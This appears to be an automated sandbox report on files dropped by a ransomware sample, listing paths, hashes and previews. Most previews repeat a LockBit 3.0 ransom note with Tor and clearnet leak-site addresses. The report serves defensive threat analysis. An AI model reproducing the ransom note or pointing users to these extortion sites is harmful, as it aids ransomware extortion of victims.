                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState\Traces\CortanaTrace1.etl.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):65783
                Entropy (8bit):7.997359392098402
                Encrypted:true
                SSDEEP:1536:qKldGfRjAvRHZ+27YaRAHN5ecFt0d2D9hwComN5RwUVX:vreRcRw27YrMcGU7rt5RZX
                MD5:2817BA8C19E38270805402BBBC51F759
                SHA1:F1EEA186632415A451658B68B25EEA340897C248
                SHA-256:A214842ED2FC20CB3DC81D9BDD9F07299BF1E40BD4F508DD70CA5983BD4231CE
                SHA-512:529E958881D2D7A06C2F70D62538DECBE9C3786CDC0DC56C43409627FE9A7C73DF2840422A49449DD30B34FC758F2E7965058D55748C5F4C9BD620C13FAF296C
                Malicious:true
                Preview:'..Y....?O.FcF...P.k..H....3.B/..._.......7....(1...P.e...b...wP...@.aC.'..-.d..e)..e.w........l.S.#..x.y..2mC..i.<...|.J..(......1...8.....I'J...<Td..%_..l...|.~eE97.x,.{-%. .h..@..i!.vQ....wy..\........T...os.....*5`...V..J.w..JC..Y3(./...Sm..g....0/.U...[.z2....m}2Hh.O..Z./D;.....I;...:<..&l....0....N+..Tr.)x.."..1..V..K7]...)'n+.9.{.HR..w..!...V..[...].|..L%~?.!....k.8~T.......RN5..m%.e......'.........Vz^.........a.tG.t6'..4.^.g...H.)...5...$n.U.7.L./...A...s/mf...7$.).B...A..t...'I....5.....$.....G..1.|.xw...."x...[..[\..........h..W.v.....K`.......a...6AD.1.!........-....k.!.<..t=j..3x*./..D9!5.........6.V.-......(.L.....pY..2.[ .z.>b!@.].s.[.*z...9.>.#.FC{.DA.;..\....w>.(H-....b ....m]V.....r/%.d.U...q..,...?-.......-$iY..VV..../%"...4... .UL..1...*%#L....3.x.+.sS.d.F....I.zH..k.v./d..N..;f2.W..te.....L.W.Ex....!jU.....5%B.f=4.,.y=Z...)%)..s..Y..8C....!. .O...]!xd..[.P.........sK..I.R.y......l.<+z...~.!)..1....,.....k..Y..s....Cq

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState\Traces\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.976084220964707
                Encrypted:false
                SSDEEP:192:jawvi3vqRuLnpNRTPvyVODdF2r66kmTOt+3NovbeVlo:jHK3yYLnp3vDSqHt+9ESY
                MD5:19E33F3202743FD806D63A0DF4B2C2F9
                SHA1:8890F8E9103DDC2B45F7EAB68A5CBC8FEEF4F255
                SHA-256:0539D75BC248711C438FCF5BA4121CFFDB7201F7C1F0BA24B91B302FF3CADBF1
                SHA-512:31066C08BEB68EEB5CD4BBE301D6BA045931479249CC7942A004E0AEBBB7FAC4822F4DFA580A02B27F5AFCB708DD45D977A9ED00940329CDAFB443B2016A8F80
                Malicious:false
                Preview:.p.7.....b.b=.o....* .......s......a=.^.!*a.8.M...........?..N...b....../{A....n.R..&....m...ZvvE..}U.$.-|....s.3A....._..x..%P..R{@..g..e.s\Z..A....t.1.r.wd,...).w_....mV..g1.6.i...l0.........fj0.p"...~....jwX....A.#...s.I.`e..w........8..<.9.c..e..<-....)...._u..n.._. ....._u.Yt5..7...k3&.r_t......+5..n.O/a......2.e..9s.wJ._A!P.a}K...n8.R3\U..6...Ev...(..b6...p....*R..U.).C.C%-...P8..Kl..G+..F.....^@.....P........0.s......5..GhII)./....,b k.Op...Rj..n...'...+.....d....6.h....X./..S0...j(.dy&.7.N.u.+#7>..'[...$.....tX{'>_e...*....\.....aC..:.p.7.s.....'&B.Sf....6.....F...s..7.......S.cj....#.......w.....PH....HF.......!5.!..9....a;.V.mQ..{.?.Y.kt..fv.O...).Rw.".....d[.KN....B.&......m.H.&W.H...La.E..<...;../..PJKPg/>.}.Of......X.x...U.....P<u...+..1........Q.n3.^.hV".a.p..tn.Po.?.|. b.BS0.FM..G.....i..D.p.4.=........."..Y..B....g.....r.2.....2...........K...c.d.H.8R..X.....*Y..2..Q.l......m.+.)y=:WO.}.W.V...1..]....a..

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
